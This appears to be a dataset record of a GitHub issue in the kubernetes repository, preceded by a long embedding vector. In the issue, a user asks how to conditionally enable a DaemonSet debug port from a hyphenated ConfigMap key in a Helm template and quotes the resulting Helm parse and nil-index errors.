0.008691737428307533, 0.005585599225014448, -0.018132762983441353, -0.00698881084099412, -0.003855425864458084, 0.01242455281317234, -0.00036463915603235364, 0.037437137216329575, 0.01273789070546627, -0.00001903818701975979, -0.0008642352186143398, -0.005619657691568136, -0.01370515301823616, -0.006995622534304857, -0.0007944152457639575, 0.02568013221025467, -0.005401683039963245, -0.004196010995656252, -0.028200464323163033, -0.017274487763643265, -0.032369229942560196, 0.010156254284083843, 0.007281714119017124, -0.028990622609853745, 0.01337819080799818, -0.0139163164421916, 0.007683604955673218, -0.011906862258911133, -0.009270732291042805, 0.01976757124066353, -0.0034194765612483025, -0.0005432335892692208, -0.0036646979860961437, 0.017560578882694244, -0.021375134587287903, 0.012002226896584034, -0.01528546866029501, -0.026238692924380302, 0.020639469847083092, -0.0055617582984268665, 0.022029059007763863, 0.014440817758440971, -0.011893238872289658, -0.019358869642019272, -0.012928619049489498, -0.006103288847953081, 0.007254467345774174, 0.016511576250195503, 0.018704945221543312, 0.020040040835738182, 0.011096269823610783, 0.014726908877491951, -0.012717455625534058, 0.007506500463932753, 0.002615695120766759, 0.00010084518726216629, -0.005354001186788082, -0.001549663138575852, -0.0015522176399827003, 0.032886918634176254, 0.016062002629041672, -0.011205256916582584, 0.010292488150298595, -0.0030397239606827497, -0.019726701080799103, 0.019672207534313202, -0.01595301553606987, -0.0030635648872703314, -0.005905749276280403, -0.015190104953944683, -0.009815668687224388, 0.002350038615986705, 0.012458611279726028, -0.01890929602086544, -0.0018612988060340285, 0.0023193859960883856, -0.009120875038206577, 0.007234032265841961, 0.002448808401823044, 0.005616251844912767, 0.013963998295366764, -0.01136192586272955, 0.0097816102206707, -0.0002869431336876005, -0.006821923889219761, -0.007540558930486441, 0.03899020701646805, -0.008562315255403519, 0.025884484872221947, -0.004543408285826445, -0.013596165925264359, -0.008896088227629662, -0.0180510226637125, 0.029453817754983902, 0.005319942720234394, -0.009645376354455948, 0.02024439163506031, 0.030216729268431664, 0.002111628884449601, 0.00843289215117693, -0.01467241533100605, -0.0026276158168911934, -0.02029888518154621, 0.004986168816685677, -0.012690208852291107, 0.0075269355438649654, 0.005190520081669092, -0.009788421913981438, -0.007288525812327862, -0.016184614971280098, -0.01251310482621193, -0.001507941517047584, -0.00942740123718977, -0.015053871087729931, 0.01694752462208271, -0.00748606538400054, 0.021879199892282486, 0.016457082703709602, 0.03367707505822182, -0.001027716207318008, 0.0034978112671524286, -0.0052416082471609116, -0.0028541048523038626, -0.003148711286485195, -0.0037123800721019506, -0.009515954181551933, 0.0004206228768453002, 0.0035488989669829607, -0.006944534834474325, 0.03915368765592575, -0.011477725580334663, 0.005156461615115404, -0.02147049829363823, -0.01467241533100605, -0.01694752462208271, 0.02997150830924511, -0.00834434013813734, -0.008283034898340702, 0.010517274960875511, -0.002874540165066719, 0.013446308672428131, -0.010660320520401001, 0.010353793390095234, -0.03127935528755188, -0.00011686333891702816, -0.015435326844453812, -0.0029613892547786236, 0.019004661589860916, -0.01008132565766573, 0.0061850291676819324, -0.01901828497648239, 0.009325225837528706, -0.010258429683744907, -0.055065833032131195, 0.02098005637526512, 0.008977828547358513, -0.013950374908745289, 0.0012295129708945751, 0.014127478934824467, 0.02795524336397648, 0.02641579695045948, 0.011613959446549416, 0.020911937579512596, 0.014863143675029278, -0.0007952667074277997, -0.006430250592529774, 0.02343226969242096, 0.000496828812174499, 0.02217891626060009, 0.017015641555190086, 0.008303469978272915, -0.01030611153692007, 0.005207549314945936, -0.005803573876619339, 0.000029588349207188003, 0.00524501409381628, 0.001250799628905952, -0.02325516566634178, 0.007533747237175703, -0.0008629580261185765, 0.02380010113120079, -0.006798082962632179, -0.018091892823576927, 0.007956072688102722, -0.020312508568167686, -0.004672830458730459, 0.013105723075568676, 0.011150763370096684, 0.020026417449116707, 0.012376870028674603, -0.004655801225453615, -0.02152499184012413, -0.0032866483088582754, -0.018895672634243965, 0.0325327105820179, 0.009686246514320374, 0.008160424418747425, -0.004941892810165882, -0.0006194395245984197, 0.01113032829016447, -0.0005785693065263331, 0.007922014221549034, 0.0006773390341550112, -0.020094534382224083, -0.007901579141616821, -0.006542643997818232, 0.0027348999865353107, 0.0018442694563418627, -0.01461792178452015, -0.01431820634752512, 0.00767679326236248, -0.003545493120327592, -0.018704945221543312, -0.013139781542122364, -0.004877181723713875, 0.006147564854472876, -0.03187878429889679, -0.003378606401383877, -0.0010507056722417474, -0.01608925126492977, -0.001306144637055695, -0.000689685286488384, -0.0014338642358779907, 0.0049691395834088326, 0.014440817758440971, -0.00975436344742775, 0.005888720043003559, -0.01531271543353796, -0.01171613484621048, -0.017015641555190086, -0.003916731104254723, 0.01595301553606987, 0.0005117294494993985, 0.025721002370119095, -0.003916731104254723, -0.024440402165055275, 0.010871483013033867, -0.0023704736959189177, 0.030870653688907623, 0.007581429090350866, -0.0020963025745004416, -0.008378398604691029, -0.006886634975671768, 0.0015462572919204831, 0.02192007191479206, -0.009134498424828053, 0.007506500463932753, 0.010312923230230808, -0.017301734536886215, 0.015653301030397415, 0.010735249146819115, -0.013991245068609715, -0.0058989375829696655, -0.004621742758899927, -0.009229862131178379, -0.0006181623321026564, -0.015013000927865505, -0.027233202010393143, -0.024304168298840523, 0.010953224264085293, -0.0037464385386556387, 0.0036885389126837254, 0.019263505935668945, 0.008889276534318924, 0.010701190680265427, -0.011082646436989307, -0.0070092459209263325, 0.021198030561208725, 0.01589852198958397, 0.01765594258904457, -0.008044625632464886, 0.003354765474796295, -0.015585184097290039, 0.006052201148122549, -0.014086608774960041, 0.010067702271044254, -0.014604298397898674, -0.013575730845332146, -0.0036510745994746685, 0.004526379052549601, 0.010857859626412392, -0.006072636228054762, 0.01817363314330578, 0.004696671385318041, 0.006971781607717276, 0.00914131011813879, 0.020489612594246864, 0.01251310482621193, 0.022587617859244347, -0.00009722646791487932, 0.004546814132481813, -0.004209634382277727, -0.0007969696307554841, 0.0044514499604702, 0.00483290571719408, 0.00522457854822278, 0.01104858797043562, 0.021307017654180527, 0.01867769844830036, -0.011641206219792366, -0.03144283592700958, -0.016811290755867958, -0.016511576250195503, 0.009972337633371353, -0.0012703832471743226, 0.003943977877497673, -0.011355114169418812, 0.019399739801883698, -0.000839542830362916, 0.022219786420464516, 0.0033939327113330364, 0.0009008481865748763, -0.008446515537798405, 0.006716342642903328, 0.013439496979117393, -0.002234239596873522, -0.019072778522968292, -0.017696812748908997, -0.010823801159858704, -0.004505943972617388, -0.009917844086885452, -0.0028421843890100718, -0.0073498310521245, -0.0002912004420068115, 0.009236673824489117, 0.004325433634221554, -0.0065256147645413876, -0.007588240783661604, 0.0031112469732761383, 0.012860501185059547, 0.018010150641202927, 0.01592576876282692, 0.011157575063407421, -0.009706681594252586, 0.011539030820131302, -0.012111213989555836, -0.015803158283233643, 0.012615280225872993, -0.0046149310655891895, -0.008943770080804825, 0.0035557106602936983, -0.0048294998705387115, -0.002925627864897251, -0.00948189478367567, 0.003606798592954874, -0.014100232161581516, -0.0027178707532584667, -0.007417947985231876, -0.016675056889653206, -0.007772156968712807, -0.014072985388338566, -0.002547578187659383, -0.02314617857336998, 0.01574866473674774, -0.013671094551682472, -0.012785572558641434, -0.016770420596003532, 0.02562563866376877, -0.009243485517799854, -0.007710851728916168, -0.003562522353604436, 0.02866365946829319, -0.007152291480451822, 0.0022410512901842594, 0.015489820390939713, -0.018636828288435936, 0.0006760618416592479, -0.009570447728037834, -0.035529859364032745, 0.0027434148360043764, -0.021633978933095932, -0.003421179484575987, 0.03438549488782883, 0.01145729050040245, -0.009720304980874062, 0.010837424546480179, 0.0010115384357050061, 0.011900050565600395, 0.023364152759313583, 0.0022802187595516443, -0.0022597836796194315, -0.023704737424850464, 0.02157948538661003, 0.0011145654134452343, 0.013963998295366764, -0.008596373721957207, 0.0044889142736792564, -0.015408080071210861, -0.0053471894934773445, -0.009515954181551933, -0.012703832238912582, -0.00382817885838449, -0.014631545171141624, -0.006171405781060457, -0.0179692804813385, -0.030298469588160515, -0.012465422973036766, 0.01880030892789364, 0.004482102580368519, 0.011763816699385643, 0.0033683888614177704, -0.014113855548202991, 0.0038043379317969084, -0.00005127405529492535, -0.04228707402944565, 0.006668660324066877, -0.006076042074710131, -0.022356020286679268, 0.018868425861001015, 0.012438176199793816, -0.0022325366735458374, -0.004645583685487509, -0.000056622309784870595, -0.033023152500391006, 0.01400486845523119, -0.007356642745435238, -0.004635366145521402, -0.000009020189281727653, -0.033023152500391006, -0.004941892810165882, -0.00007567380089312792, -0.004247098695486784, -0.01592576876282692, -0.017846670001745224, -0.010626262053847313, -0.004904428496956825, -0.0009621535427868366, 0.01854146458208561, -0.012335999868810177, 0.010571768507361412, -0.005806979723274708, -0.009066381491720676, -0.014209219254553318, 0.03634726628661156, 0.00043020182056352496, 0.012342811562120914, -0.006692501250654459, -0.00019392075773794204, -0.006011330988258123, 0.02490359917283058, 0.010360605083405972, 0.004696671385318041, -0.007295337505638599, 0.008283034898340702, -0.000014647829630121123, 0.0014159834245219827, -0.009148121811449528, -0.015803158283233643, 0.022356020286679268, 0.00867130234837532, 0.0037498443853110075, 0.021511368453502655, -0.00007306619227165356, -0.010190312750637531, -0.0012754920171573758, 0.005047474522143602, -0.0068627940490841866, 0.000035575201764004305, -0.010285676456987858, 0.011702511459589005, -0.031688056886196136, -0.00604879530146718, 0.0020401061046868563, 0.0044889142736792564, 0.023023568093776703, -0.018977412953972816, 0.0058478498831391335, 0.009604506194591522, 0.003126573283225298, -0.009209427051246166, -0.02209717594087124, 0.011443667113780975, -0.010755684226751328, 0.0293448306620121, -0.027519293129444122, -0.01207034382969141, 0.01984931156039238, 0.01990380510687828, 0.01438632421195507, -0.03441274166107178, 0.008589562028646469, 0.00034420404699631035, -0.002234239596873522, 0.013548484072089195, -0.017901163548231125, -0.020053664222359657, 0.02761465683579445, -0.0033070833887904882, 0.011995415203273296, -0.000023761147531331517, 0.015680547803640366, -0.00036932219518348575, -0.009522765874862671, 0.026211446151137352, 0.010517274960875511, -0.012124837376177311, -0.010415098629891872, -0.013330508954823017, 0.006154376547783613, -0.00762911094352603, -0.005187114235013723, -0.05065184831619263, -0.006011330988258123, 0.014468064531683922, 0.014563428238034248, -0.009536389261484146, -0.005606034304946661, 0.0042198519222438335, 0.0007386443903669715, -0.005105373915284872, -0.003974630497395992, 0.015299092046916485, -0.002145687583833933, 0.002573122037574649, -0.019576843827962875, 0.006760618649423122, 0.0025339548010379076, -0.034358248114585876, 0.0024777580983936787, -0.005466394126415253, 0.011355114169418812, -0.01788754016160965, 0.006624384317547083, 0.004870370030403137, -0.0008280480396933854, -0.004839717410504818, 0.00191919831559062, -0.016756797209382057, -0.001147772534750402, -0.013139781542122364, 0.036864954978227615, -0.005227984394878149, 0.03525739163160324, 0.008780289441347122, 0.014372700825333595, 0.013514425605535507, -0.011286997236311436, 0.029508311301469803, -0.017560578882694244, -0.0038452083244919777, -0.013412250205874443, 0.007635922636836767, -0.024998962879180908, -0.0031623346731066704, -0.026170575991272926, 0.011511784046888351, 0.008405645377933979, 0.024045323953032494, -0.01726086437702179, -0.014209219254553318, -0.0075609940104186535, -0.0025935571175068617, -0.005960242822766304, -0.028200464323163033, 0.010237994603812695, 0.011757005006074905, 0.012111213989555836, -0.005868284963071346, 0.004386738874018192, 0.003174255136400461, -0.007908390834927559, -0.01162758283317089, -0.03076166659593582, 0.0122678829357028, 0.001897060195915401, 0.002963092178106308, 0.025938978418707848, -0.0024964904878288507, -0.004018906969577074, -0.0038826726377010345, -0.009693058207631111, -0.005418712273240089, -0.013950374908745289, 0.006815112195909023, 0.020258015021681786, -0.03138834238052368, -0.0002873688645195216, -0.008453327231109142, -0.0019464450888335705, 0.01141641940921545, 0.0055447290651500225, -0.004178981762379408, -0.0004012520657852292, -0.002385800238698721, 0.008521445095539093, -0.0043663037940859795, 0.017465215176343918, 0.008827971294522285, -0.004788629710674286, -0.030788913369178772, -0.014658791944384575, -0.012431364506483078, 0.004553625825792551, 0.006317857652902603, -0.033568087965250015, 0.004056371282786131, 0.01916814222931862, 0.02032613195478916, -0.010742060840129852, 0.00767679326236248, -0.01397762168198824, -0.005442553199827671, -0.007744910195469856, 0.012029473669826984, -0.0010643290588632226, 0.009965525940060616, -0.00046106736408546567, -0.009345660917460918, -0.0012823037104681134, -0.005394871346652508, -0.013555295765399933, 0.006290610879659653, -0.007799403741955757, -0.01569417119026184, 0.012608468532562256, 0.003678321372717619, 0.002668485976755619, -0.022614864632487297, 0.015108364634215832, -0.023650243878364563, 0.00034377831616438925, -0.002688921056687832, 0.017901163548231125, 0.0027297912165522575, 0.013344132341444492, -0.027655526995658875, -0.02715146169066429, 0.010353793390095234, -0.008085495792329311, -0.011777440086007118, -0.012376870028674603, -0.0008182562305592, -0.009223050437867641, 0.00549364136531949, -0.0021524992771446705, 0.0017523114802315831, 0.010844236239790916, -0.003148711286485195, 0.00011707620433298871, 0.013078476302325726, 0.00023308808158617467, -0.00323045183904469, 0.04438507929444313, 0.009413777850568295, 0.015966638922691345, 0.009032323025166988, -0.017506085336208344, 0.00940015446394682, -0.017274487763643265, -0.01914089545607567, -0.013126158155500889, 0.013023982755839825, 0.006161188241094351, -0.006409815512597561, 0.011947733350098133, 0.005984084215015173, -0.0007096946355886757, -0.036211032420396805, -0.0006343401619233191, -0.012056720443069935, 0.011034964583814144, -0.011804686859250069, 0.016933901235461235, 0.013882257975637913, 0.029481064528226852, 0.002009453484788537, -0.022614864632487297, -0.004301592707633972, -0.0025509840343147516, 0.004907834343612194, 0.0010915759485214949, -0.02371836081147194, 0.018745815381407738, 0.0006190137937664986, -0.0026923269033432007, -0.022955451160669327, 0.008439703844487667, -0.03144283592700958, -0.005285884253680706, 0.00585806742310524, -0.0016952634323388338, -0.002598665887489915, -0.0057013980112969875, 0.00999277364462614, -0.01828262023627758, 0.0042947810143232346, 0.008555503562092781, 0.02508070319890976, -0.012090778909623623, 0.0004214743385091424, -0.023500386625528336, 0.020775703713297844, 0.005687774624675512, -0.011116704903542995, -0.018950166180729866, 0.01825537346303463, -0.026552030816674232, 0.0018664075760170817, -0.003223639912903309, 0.012812819331884384, -0.0017710436368361115, -0.019522350281476974, -0.011586712673306465, 0.011934109963476658, 0.018868425861001015, -0.001267828862182796, -0.0047784121707081795, 0.005827414803206921, 0.008766666054725647, 0.016675056889653206, 0.011797875165939331, -0.007554182317107916, -0.0195632204413414, 0.006498367991298437, 0.004117676522582769, -0.0028728372417390347, 0.00474775955080986, 0.003995065577328205, 0.013841386884450912, -0.02351401001214981, -0.011300620622932911, -0.01948148012161255, 0.0002488401369191706, -0.0004165784048382193, -0.025489404797554016, -0.013555295765399933, 0.02798249013721943, 0.00277577037923038, -0.009652188047766685, -0.011293808929622173, 0.013139781542122364, -0.0002556518593337387, 0.013575730845332146, -0.007908390834927559, 0.02345951646566391, 0.013861821964383125, 0.026252316311001778, -0.0081740478053689, 0.00032760051544755697, -0.0028932723216712475, 0.00040678659570403397, -0.010994094423949718, 0.005987490061670542, 0.007458818610757589, 0.024958092719316483, -0.000005441382654680638, 0.017696812748908997, 0.013255580328404903, -0.0016271463828161359, 0.0007931380532681942, 0.007029681000858545, 0.005571975838392973, 0.010319734923541546, 0.004413985647261143, -0.006511991377919912, 0.021388757973909378, 0.03182429075241089, 0.0089573934674263, -0.0211026668548584, -0.02050323598086834, 0.012806007638573647, -0.0037464385386556387, -0.016075627878308296, -0.02340502291917801, -0.00641322135925293, 0.006307640112936497, 0.0004951258888468146, -0.019699454307556152, 0.0031793639063835144, 0.012662962079048157, -0.005221172701567411, 0.019753947854042053, 0.0070092459209263325, -0.0030669707339257, 0.01683853752911091, -0.017356228083372116, 0.018773062154650688, 0.017615072429180145, -0.02798249013721943, -0.003344547701999545, -0.022301526740193367, -0.005912560969591141, -0.0009587476961314678, 0.007111421320587397, -0.002111628884449601, -0.014658791944384575, -0.0020315914880484343, -0.003824773011729121, -0.008228541351854801, 0.008133177645504475, -0.0025577957276254892, -0.00302439765073359, -0.004465073347091675, -0.0025884483475238085, 0.003075485350564122, -0.004897616803646088, -0.002295545069500804, -0.00762911094352603, 0.006389380432665348, 0.01467241533100605, 0.023323282599449158, -0.009767986834049225, 0.0356115996837616, 0.012628903612494469, 0.01204309705644846, -0.012172519229352474, -0.01098728273063898, -0.009985961951315403, 0.006099883001297712, -0.014822272583842278, -0.006409815512597561, -0.0146451685577631, -0.009291167370975018, -0.0057252394035458565, -0.0039541954174637794, 0.02294182777404785, -0.0066141667775809765, 0.027560163289308548, -0.031088627874851227, 0.018010150641202927, 0.005558352451771498, 0.020367002114653587, 0.022928204387426376, 0.0071659148670732975, -0.00878710113465786, 0.004076806362718344, 0.014359076507389545, 0.020680340006947517, -0.011116704903542995, -0.0014296068111434579, 0.02482185699045658, -0.001648432924412191, -0.00007535450276918709, 0.00026012203306891024, -0.014904013834893703, -0.002651456743478775, 0.031006887555122375, -0.00928435567766428, -0.008501009084284306, 0.0009212832665070891, 0.014835895970463753, -0.009202615357935429, 0.020067287608981133, -0.009747551754117012, 0.00439355056732893, -0.010149442590773106, 0.00414492329582572, -0.013098911382257938, -0.0065460498444736, -0.012765137478709221, -0.008323905058205128, -0.011252938769757748, 0.015598807483911514, 0.01282644271850586, 0.011443667113780975, 0.005040662828832865, 0.013160216622054577, 0.022219786420464516, 0.016647810116410255, -0.02050323598086834, 0.03136109560728073, -0.01736985146999359, 0.016184614971280098, -0.01751970872282982, -0.03255995735526085, 0.0028813518583774567, 0.006685689557343721, 0.0025918541941791773, -0.0031589288264513016, 0.03700118884444237, 0.016116498038172722, -0.007635922636836767, 0.005670745391398668, 0.021116290241479874, 0.010374228470027447, 0.03171530365943909, 0.000886373280081898, 0.0028506990056484938, -0.024631129577755928, -0.017179124057292938, 0.007996942847967148, 0.007343019358813763, 0.0023517415393143892, 0.02345951646566391, 0.008310281671583652, 0.016416212543845177, 0.024018077179789543, -0.0028370756190270185, -0.0017242131289094687, 0.005255231633782387, -0.006379162892699242, -0.006801488809287548, 0.005950025282800198, 0.010564956814050674, 0.010415098629891872, 0.018922919407486916, -0.009767986834049225, -0.002377285622060299, 0.0006773390341550112, 0.010667132213711739, 0.02092556096613407, 0.0007552479510195553, 0.009107251651585102, -0.012036285363137722, -0.002252971986308694, 0.011239315383136272, 0.002126955194398761, -0.014263712801039219, -0.019890181720256805, 0.00047341358731500804, -0.011436854489147663, -0.011539030820131302, 0.05212317779660225, -0.008753042668104172, -0.012124837376177311, 0.0016245919978246093, -0.009740740060806274, 0.030325716361403465, -0.024549389258027077, 0.011879615485668182, -0.006331481039524078, -0.0325327105820179, -0.004843123257160187, -0.003242372302338481, 0.0023398210760205984, 0.002399423625320196, -0.004751165397465229, 0.0013027387904003263, 0.004424203187227249, 0.00966581143438816, -0.013310073874890804, 0.02544853463768959, -0.0039031077176332474, -0.02212442271411419, -0.013602977618575096, 0.03384055569767952, 0.006586920004338026, 0.015626054257154465, -0.005967054981738329, 0.0042198519222438335, -0.00949551910161972, 0.01736985146999359, -0.0002624635526444763, -0.008746230974793434, -0.0015445543685927987, -0.0196177139878273, -0.017560578882694244, 0.015217351727187634, -0.008773477748036385, -0.00046234455658122897, 0.0013844793429598212, 0.0042607225477695465, -0.030407456681132317, 0.006770836189389229, 0.014904013834893703, -0.006971781607717276, 0.011988603509962559, -0.008133177645504475, 0.013746023178100586, 0.010728437453508377, -0.02581636793911457, 0.013929939828813076, -0.01461792178452015, -0.004689859692007303, 0.004032530356198549, 0.006726560182869434, 0.006784459576010704, 0.020380625501275063, -0.01405936200171709, 0.021593108773231506, 0.00781983882188797, 0.012928619049489498, 0.011934109963476658, 0.01434545312076807, 0.007445195224136114, 0.013310073874890804, 0.008323905058205128, -0.026592900976538658, 0.035448119044303894, -0.00026629515923559666, 0.016811290755867958, 0.021034549921751022, 0.008507820777595043, -0.0042947810143232346, -0.012724267318844795, 0.005268855020403862, 0.004608119372278452, -0.009999585337936878, -0.0058989375829696655, -0.02340502291917801, -0.0292358435690403, 0.023759230971336365, -0.02175658941268921, -0.023445893079042435, 0.0163480956107378, 0.003087405813857913, 0.005258637480437756, 0.0020230768714100122, -0.02288733422756195, 0.011934109963476658, 0.004161952529102564, 0.015339963138103485, -0.00005928313112235628, -0.005619657691568136, -0.0244812723249197, -0.0072749024257063866, 0.015789534896612167, -0.019699454307556152, -0.03144283592700958, -0.0035352755803614855, 0.016239108517766, 0.002711059059947729, 0.01049002818763256, 0.011157575063407421, 0.0035318697337061167, 0.020094534382224083, -0.010169877670705318, 0.015816781669855118, 0.007227220572531223, -0.00408702390268445, 0.018950166180729866, -0.008678114041686058, 0.011402796022593975, -0.011525407433509827, 0.0064336564391851425, -0.0056673395447432995, -0.00767679326236248, -0.01723361760377884, 0.005987490061670542, -0.021715719252824783, 0.00031333850347436965, -0.000560688553377986, 0.02001279406249523, 0.013466743752360344, -0.0062599582597613335, -0.0021167376544326544, -0.010067702271044254, 0.0031163557432591915, 0.008405645377933979, 0.00458427844569087, 0.0010132413590326905, -0.007772156968712807, 0.005326754413545132, -0.012703832238912582, 0.017478838562965393, 0.01859595812857151, 0.0458291620016098, -0.005401683039963245, 0.008541880175471306, -0.011239315383136272, -0.005803573876619339, -0.0028677284717559814, 0.0010856157168745995, 0.0016543931560590863, -0.009250297211110592, 0.020571352913975716, -0.015081117860972881, -0.0081740478053689, 0.010428722016513348, 0.0011086051817983389, 0.013316885568201542, -0.008446515537798405, 0.0031878785230219364, 0.00043020182056352496, 0.0025748249609023333, -0.014304582960903645, 0.0014789917040616274, -0.00039380177622660995, 0.024127064272761345, 0.0032270459923893213, 0.020857444033026695, -0.00013634056085720658, 0.025257807224988937, 0.0012525025522336364, 0.00945464801043272, -0.030407456681132317, 0.025639262050390244, 0.008221729658544064, 0.014100232161581516, 0.00046489897067658603, -0.013991245068609715, 0.025857238098978996, 0.012479046359658241, 0.028282204642891884, -0.007717663422226906, -0.008991451933979988, 0.01862320490181446, 0.00023926117864903063, -0.025312300771474838, -0.010530898347496986, -0.01171613484621048, 0.025312300771474838, -0.00619184086099267, 0.005677557084709406, 0.005405088886618614, 0.028963375836610794, 0.0139163164421916, 0.01332369726151228, -0.0021576080471277237, 0.020053664222359657, 0.009297979064285755, 0.003349656704813242, 0.011777440086007118, -0.014822272583842278, -0.010823801159858704, -0.006150970701128244, 0.002470946405082941, -0.006385974586009979, 0.0030516444239765406, -0.003075485350564122, -0.017751306295394897, 0.013596165925264359, -0.009066381491720676, 0.003940572030842304, -0.014304582960903645, 0.026170575991272926, 0.013691529631614685, -0.018786685541272163, -0.009182180278003216, -0.004427609033882618, -0.002697435673326254, -0.014113855548202991, 0.028908882290124893, -0.023650243878364563, 0.005905749276280403, -0.0026088834274560213, 0.005309725180268288, -0.007772156968712807, 0.017642319202423096, 0.005289290100336075, 0.02369111403822899, -0.01268339715898037, 0.01403211522847414, -0.007213597185909748, -0.025666508823633194, 0.018555087968707085, 0.031660810112953186, 0.02696073427796364, -0.006392786279320717, 0.0025339548010379076, 0.0030465356539934874, 0.0028455902356654406, 0.005745674483478069, 0.011559465900063515, 0.004441232420504093, 0.0049180518835783005, 0.01525822188705206, -0.006791271269321442, -0.00820129457861185, 0.0008718984317965806, -0.013487178832292557, -0.03536637872457504, -0.01008132565766573, -0.01896378956735134, 0.005394871346652508, 0.0016245919978246093, 0.019345246255397797, -0.01668868027627468, -0.012601656839251518, 0.0038622375577688217, 0.00508153298869729, 0.016157368198037148, 0.020748456940054893, -0.006781053729355335, 0.01736985146999359, 0.0013350944500416517, -0.008065060712397099, -0.006031766068190336, 0.00020605411555152386, -0.0030226947274059057, -0.007247655652463436, -0.026034342125058174, 0.00006630770076299086, 0.008071872405707836, 0.02238326705992222, -0.01039466354995966, 0.006198652554303408, -0.010333358310163021, 0.0008633837569504976, 0.010769307613372803, -0.012431364506483078, 0.0022819216828793287, -0.014876767061650753, 0.020258015021681786, 0.011205256916582584, 0.004914646036922932, -0.011034964583814144, 0.025067079812288284, 0.004519567359238863, 0.017669565975666046, -0.014822272583842278, -0.004625148605555296, 0.006947940681129694, 0.011852368712425232, 0.00023010795121081173, -0.002975012641400099, 0.015121988020837307, 0.005173490848392248, 0.025121573358774185, -0.013446308672428131, -0.009570447728037834, 0.008657678961753845, 0.0011332976864650846, 0.025462158024311066, -0.026238692924380302, 0.0075609940104186535, 0.017219994217157364, 0.01063307374715805, -0.00455703167244792, -0.0008118702680803835, 0.040189068764448166, -0.0009749254677444696, 0.02220616303384304, 0.014141102321445942, 0.009604506194591522, 0.0030669707339257, -0.018091892823576927, -0.014018491841852665, 0.0025033021811395884, -0.009406966157257557, 0.01600750908255577, 0.007649546023458242, 0.013929939828813076, -0.006716342642903328, 0.00020743774075526744, 0.002556092804297805, -0.0009655593894422054, -0.01160033605992794, -0.02803698368370533, 0.006801488809287548, -0.011109893210232258, -0.005779732950031757, -0.0031367908231914043, -0.011143951676785946, 0.029481064528226852, -0.007540558930486441, 0.0015564749483019114, -0.000830602424684912, 0.002629318740218878, -0.02536679431796074, -0.014917637221515179, 0.006624384317547083, 0.018473347648978233, 0.017724059522151947, 0.02633405663073063, -0.00765635771676898, 0.008991451933979988, 0.0023755826987326145, -0.006964969914406538, 0.005432335659861565 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? I have the following daemonset.yaml my requirement is we need to enable the debug port only if services-debug is set to true. ``` apiVersion: apps/v1 kind: DaemonSet metadata: name: your-daemonset spec: selector: matchLabels: app: your-app template: metadata: labels: app: your-app spec: containers: - name: your-container image: your-image env: - name: SERVICES_DEBUG valueFrom: configMapKeyRef: name: test-config key: services-debug optional: true ports: - name: http-port containerPort: 80 # Adjust as needed hostPort: 80 # Adjust as needed - name: debug-port containerPort: 81 # Adjust as needed hostPort: 81 # Adjust as needed ``` i have tried the following option ``` {{- if eq (index .Values.configMap.test-config "services-debug") "true" }} - name: debug-port containerPort: {{ .Values.image.debug-port }} hostPort: {{ .Values.image.debug-port }} {{- end }} ``` but when we use it helm is throwing `Error: parse error at (test/templates/daemonset.yaml:59): bad character U+002D '-'` also tried ``` {{- if eq (index .Values.configMap "test-config" "services-debug") "true" }} - name: debug-port containerPort: {{ .Values.image.debug-port }} hostPort: {{ .Values.image.debug-port }} {{- end }} ``` but giving `templates/daemonset.yaml:59:20: executing "test/templates/daemonset.yaml" at <index .Values.configMap "test-config" "services-debug">: error calling index: index of untyped nil` ### What did you expect to happen? it should procced without any errors ### How can we reproduce it (as minimally and precisely as possible)? crated a config map and key which contains the hyphen in it. Try to use the configmap key in the if condition. ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version Client Version: v1.29.0+rke2r1 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.29.0+rke2r1 ``` </details> ### Cloud provider <details> </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release PRETTY_NAME="Debian GNU/Linux 12 (bookworm)" NAME="Debian GNU/Linux" VERSION_ID="12" VERSION="12 (bookworm)" VERSION_CODENAME=bookworm ID=debian HOME_URL="https://www.debian.org/" SUPPORT_URL="https://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/" $ uname -a Linux pamutil46-32 6.1.73+pam01 #1 SMP PREEMPT_DYNAMIC Thu Jan 18 10:16:13 PST 2024 x86_64 GNU/Linux ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details>
enable ports based on the config value in the kubernates
https://api.github.com/repos/kubernetes/kubernetes/issues/124394/comments
4
2024-04-19T05:36:07
2024-04-19T06:28:55Z
https://github.com/kubernetes/kubernetes/issues/124394
2,252,125,493
124,394
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : enable ports based on the config value in the kubernates Issue date: --- start body --- ### What happened? I have the following daemonset.yaml my requirement is we need to enable the debug port only if services-debug is set to true. ``` apiVersion: apps/v1 kind: DaemonSet metadata: name: your-daemonset spec: selector: matchLabels: app: your-app template: metadata: labels: app: your-app spec: containers: - name: your-container image: your-image env: - name: SERVICES_DEBUG valueFrom: configMapKeyRef: name: test-config key: services-debug optional: true ports: - name: http-port containerPort: 80 # Adjust as needed hostPort: 80 # Adjust as needed - name: debug-port containerPort: 81 # Adjust as needed hostPort: 81 # Adjust as needed ``` i have tried the following option ``` {{- if eq (index .Values.configMap.test-config "services-debug") "true" }} - name: debug-port containerPort: {{ .Values.image.debug-port }} hostPort: {{ .Values.image.debug-port }} {{- end }} ``` but when we use it helm is throwing `Error: parse error at (test/templates/daemonset.yaml:59): bad character U+002D '-'` also tried ``` {{- if eq (index .Values.configMap "test-config" "services-debug") "true" }} - name: debug-port containerPort: {{ .Values.image.debug-port }} hostPort: {{ .Values.image.debug-port }} {{- end }} ``` but giving `templates/daemonset.yaml:59:20: executing "test/templates/daemonset.yaml" at <index .Values.configMap "test-config" "services-debug">: error calling index: index of untyped nil` ### What did you expect to happen? it should procced without any errors ### How can we reproduce it (as minimally and precisely as possible)? crated a config map and key which contains the hyphen in it. Try to use the configmap key in the if condition. ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version Client Version: v1.29.0+rke2r1 Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3 Server Version: v1.29.0+rke2r1 ``` </details> ### Cloud provider <details> </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release PRETTY_NAME="Debian GNU/Linux 12 (bookworm)" NAME="Debian GNU/Linux" VERSION_ID="12" VERSION="12 (bookworm)" VERSION_CODENAME=bookworm ID=debian HOME_URL="https://www.debian.org/" SUPPORT_URL="https://www.debian.org/support" BUG_REPORT_URL="https://bugs.debian.org/" $ 